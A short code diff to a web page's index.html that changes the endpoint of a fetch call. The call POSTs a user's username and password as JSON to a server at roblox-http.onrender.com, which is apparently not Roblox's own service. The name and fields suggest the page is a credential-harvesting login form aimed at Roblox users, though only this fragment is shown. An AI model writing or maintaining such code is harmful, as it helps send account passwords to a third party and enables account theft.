--- a/public/index.html
+++ b/public/index.html
@@ -24,7 +24,7 @@
         return;
       }
 
-      fetch("https://roblox-http.onrender.com", {
+      fetch("https://roblox-http.onrender.com/jump", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ username, password })
